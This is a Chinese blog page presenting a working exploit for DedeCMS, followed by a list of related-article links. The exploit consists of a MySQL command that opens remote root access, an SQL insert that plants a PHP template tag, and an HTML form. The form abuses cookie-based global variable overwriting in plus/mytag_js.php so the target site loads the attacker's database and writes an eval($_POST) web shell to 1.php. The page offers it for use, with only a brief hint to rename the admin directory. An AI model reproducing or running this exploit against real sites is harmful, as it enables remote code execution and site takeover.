当前位置: 首页 > news >正文

DEDECMS拿SHELL EXP

news 来源:原创 2024/4/29 23:14:33

此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell
因此大家一定要养成使用DEDECM建站时改后台名字的习惯。


MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION;

 

接下来:

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval($_POST[c])?>\');echo "OK";@fclose($fp);{/dede:php}'); 
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究
 <form action="" method="post" name="QuickSearch" id="QuickSearch"onsubmit="addaction();">

<input type="text" value="http://www.laod.org/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />

<input type="text" value="dbhost"name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />

<input type="text"value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />

<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />

<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br/>

<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />

<input type="text" value="true" name="nocache" style="width:400">

<input type="submit"value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>

相关文章:

  • Loadrunner教程
  • 使用JMeter进行性能测试
  • Mysql跨库入侵介绍
  • web安全设置和目录权限设置介绍
  • oracle加固经验(个人补充及完善)
  • 域内计算机和用户获取
  • Access数据库注入高级玩法
  • 两个SQL语句判断数据库web是否分离
  • MYSQL注入中load_file()函数的进一步应用
  • load_file() MYSQL入侵时查看常用敏感信息文件
  • 渗透实战之安全设备踩点
  • MS SQL注入碰到关键词被过滤后的解决思路
  • MSSQL注入利用Group byhaving猜表名和字段名
  • 一份比较详细的DOS命令说明!
  • 一次利用imap漏洞的入侵
  • 08.Android之View事件问题
  • Create React App 使用
  • CSS3 变换
  • Cumulo 的 ClojureScript 模块已经成型
  • Docker 1.12实践:Docker Service、Stack与分布式应用捆绑包
  • ECMAScript入门(七)--Module语法
  • Invalidate和postInvalidate的区别
  • Markdown 语法简单说明
  • Ruby 2.x 源代码分析:扩展 概述
  • tensorflow学习笔记3——MNIST应用篇
  • ucore操作系统实验笔记 - 重新理解中断
  • Vue全家桶实现一个Web App
  • weex踩坑之旅第一弹 ~ 搭建具有入口文件的weex脚手架
  • 模仿 Go Sort 排序接口实现的自定义排序
  • 让你的分享飞起来——极光推出社会化分享组件
  • 深度学习中的信息论知识详解
  • 微信公众号开发小记——5.python微信红包
  • 延迟脚本的方式
  • 硬币翻转问题,区间操作
  • 源码安装memcached和php memcache扩展
  • # 数论-逆元
  • ###项目技术发展史
  • (06)金属布线——为半导体注入生命的连接
  • (1)(1.19) TeraRanger One/EVO测距仪
  • (C#)获取字符编码的类
  • (附源码)计算机毕业设计ssm高校《大学语文》课程作业在线管理系统
  • (附源码)计算机毕业设计SSM智能化管理的仓库管理
  • (学习日记)2024.04.10:UCOSIII第三十八节:事件实验
  • .class文件转换.java_从一个class文件深入理解Java字节码结构
  • .mysql secret在哪_MySQL如何使用索引
  • .NET Core 2.1路线图
  • .NET Core WebAPI中使用Log4net 日志级别分类并记录到数据库
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地中转一个自定义的弱事件(可让任意 CLR 事件成为弱事件)
  • .NET/C# 异常处理:写一个空的 try 块代码,而把重要代码写到 finally 中(Constrained Execution Regions)
  • .net中生成excel后调整宽度
  • /etc/sudoers (root权限管理)
  • @TableId注解详细介绍 mybaits 实体类主键注解
  • [ 第一章] JavaScript 简史
  • [ 云计算 | AWS ] 对比分析:Amazon SNS 与 SQS 消息服务的异同与选择
  • [Android] Amazon 的 android 音视频开发文档